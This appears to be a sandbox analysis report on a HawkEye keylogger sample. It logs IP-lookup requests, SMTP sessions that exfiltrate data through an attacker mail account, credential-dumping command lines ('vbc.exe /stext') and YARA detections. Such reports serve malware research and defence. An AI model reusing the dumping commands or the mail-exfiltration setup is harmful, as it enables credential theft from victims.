Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49759 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 15:02:38.523021936 CET | 844 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Nov 18, 2020 15:02:38.549550056 CET | 844 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:02:38 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:02:38 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d432e42000063776eb34000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423af6cb926377-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49776 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 15:03:21.354469061 CET | 5549 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Nov 18, 2020 15:03:21.376317978 CET | 5550 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:21 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:21 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d43d59000002c2ed824b000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c0288692c2e-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49783 | 104.16.155.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 15:03:33.843103886 CET | 5584 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Nov 18, 2020 15:03:33.867271900 CET | 5584 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:33 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:33 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d44065900002b95012f5000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c508af42b95-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49790 | 104.16.155.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 15:04:00.721941948 CET | 5624 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Nov 18, 2020 15:04:00.753989935 CET | 5624 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:04:00 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:04:00 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d446f5c0000d6bda83ec000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423cf88d18d6bd-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 18, 2020 15:02:24.647198915 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:02:24 -0700
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 18, 2020 15:02:24.825001001 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 445817
Nov 18, 2020 15:02:25.106144905 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250-SMTPUTF8
250 HELP
Nov 18, 2020 15:02:25.106544971 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
Nov 18, 2020 15:02:25.388585091 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Nov 18, 2020 15:02:25.858115911 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
Nov 18, 2020 15:02:25.858395100 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
Nov 18, 2020 15:02:26.139451027 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 OK
Nov 18, 2020 15:02:26.139874935 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | RCPT TO:<ansaf@iigcest.com>
Nov 18, 2020 15:02:26.422636032 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 Accepted
Nov 18, 2020 15:02:26.422939062 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | DATA
Nov 18, 2020 15:02:26.703959942 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Nov 18, 2020 15:02:26.705427885 CET | 49750 | 587 | 192.168.2.4 | 166.62.27.57 | .
Nov 18, 2020 15:02:27.002060890 CET | 587 | 49750 | 166.62.27.57 | 192.168.2.4 | 250 OK id=1kfO2U-008ZMO-Gu
Nov 18, 2020 15:03:06.695435047 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:03:06 -0700
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 18, 2020 15:03:06.695717096 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 445817
Nov 18, 2020 15:03:06.958623886 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-CHUNKING
250-STARTTLS
250-SMTPUTF8
250 HELP
Nov 18, 2020 15:03:06.959141970 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
Nov 18, 2020 15:03:07.222193003 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Nov 18, 2020 15:03:07.495678902 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
Nov 18, 2020 15:03:07.495965004 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
Nov 18, 2020 15:03:07.758713007 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 OK
Nov 18, 2020 15:03:07.758955002 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | RCPT TO:<ansaf@iigcest.com>
Nov 18, 2020 15:03:08.022917032 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 Accepted
Nov 18, 2020 15:03:08.025825977 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | DATA
Nov 18, 2020 15:03:08.288832903 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
Nov 18, 2020 15:03:08.290122032 CET | 49774 | 587 | 192.168.2.4 | 166.62.27.57 | .
Nov 18, 2020 15:03:08.570868969 CET | 587 | 49774 | 166.62.27.57 | 192.168.2.4 | 250 OK id=1kfO3A-008aRf-3m

                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage


                                                                      Memory Usage


                                                                      High Level Behavior Distribution


                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:15:01:48
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:01:49
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:01:50
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:01:59
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2308
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:02
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:03
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:08
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:33
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:02:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:02:35
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
